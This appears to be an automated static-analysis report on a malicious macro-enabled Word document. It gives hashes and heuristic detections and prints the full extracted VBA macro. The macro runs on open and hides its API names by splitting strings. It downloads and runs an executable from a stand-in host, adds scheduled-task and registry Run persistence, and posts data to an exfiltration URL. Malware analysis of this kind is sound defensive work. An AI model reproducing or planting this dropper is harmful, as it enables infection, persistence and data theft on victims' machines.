Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 7359068cbd759a8f…

MALICIOUS

Office (OOXML) / .DOCX

Size: 18.6 KB
Created: 2026-05-08 15:48:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2026-05-29
MD5: fd420bb14a79bf1c2bee1baf6dd02d71
SHA-1: f1ea5c13dea8b9f25d740953c1a7f2aebd533168
SHA-256: 7359068cbd759a8fbaf3d26cd739c6bd56fdbf5bb10ac9eea48d81fb7057c52b
Risk Score: 250

Heuristics 7

  • VBA project inside OOXML [medium] OOXML_VBA (5 related findings)
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script:
        Dim shell As Object
  • VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths, this is a download-and-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
        stream.Write xmlHttp.ResponseBody
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script:
        Dim shell As Object
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
        Set xmlHttp = CreateObject("M" & "SXML2.X" & "MLHT" & "TP")
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
        Private Sub Document_Open()
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2277 bytes
SHA-256: 46bef19bcf2884492c70f723352da51ed009bb0778b14e16b8711f0bad262b53
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim shell As Object
    Dim xmlHttp As Object
    Dim stream As Object
    Dim taskName As String
    Dim exePath As String
    Dim registryPath As String
    Dim keyName As String
    Dim c2Server As String
    Dim dataToSend As String
    
    ' Set variables
    taskName = "U" & "pd" & "ateT" & "as" & "k"
    exePath = "C" & ":\W" & "in" & "do" & "ws\T" & "em" & "p\u" & "pd" & "at" & "e.e" & "xe"
    registryPath = "H" & "KEY_C" & "URREN" & "T_U" & "SER" & "ER\S" & "oftw" & "are\M" & "icr" & "oso" & "ft\W" & "ind" & "ows\C" & "urre" & "ntVe" & "rsi" & "on\R" & "un"
    keyName = "U" & "pd" & "ate" & "r"
    c2Server = "h" & "tt" & "p://" & "e" & "xa" & "mp" & "le.c" & "om/u" & "pd" & "at" & "e.e" & "xe"
    dataToSend = "S" & "ys" & "te" & "mI" & "nf" & "o"
    
    ' Download executable payload
    Set xmlHttp = CreateObject("M" & "SXML2.X" & "MLHT" & "TP")
    xmlHttp.Open "G" & "ET", c2Server, False
    xmlHttp.Send
    
    If xmlHttp.Status = 200 Then
        Set stream = CreateObject("A" & "DOB" & "D.S" & "t" & "ream")
        stream.Type = 1 ' adTypeBinary
        stream.Open
        stream.Write xmlHttp.ResponseBody
        stream.SaveToFile exePath, 2 ' adSaveCreateOverWrite
        stream.Close
    End If
    
    ' Execute the downloaded executable
    Set shell = CreateObject("W" & "Sc" & "ript.S" & "hell")
    shell.Run exePath, 0, True
    
    ' Create scheduled task
    shell.Run "s" & "cht" & "asks /" & "cre" & "ate /" & "tn " & taskName & " /" & "tr " & exePath & " /" & "sc on" & "logon", 0, True
    
    ' Add registry key for persistence
    shell.RegWrite registryPath & "\" & keyName & "\", exePath, "REG_S" & "Z"
    
    ' Exfiltrate data over HTTP
    Set xmlHttp = CreateObject("M" & "SXML2.X" & "MLHT" & "TP")
    xmlHttp.Open "P" & "OST", "h" & "tt" & "p://" & "e" & "xa" & "mp" & "le.c" & "om/e" & "xf" & "il", False
    xmlHttp.Send dataToSend
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 11264 bytes
SHA-256: f6e175b1d30350277ee9e5a1bfc09fef3a66df0d4b959aeee9a6bc92e40d7612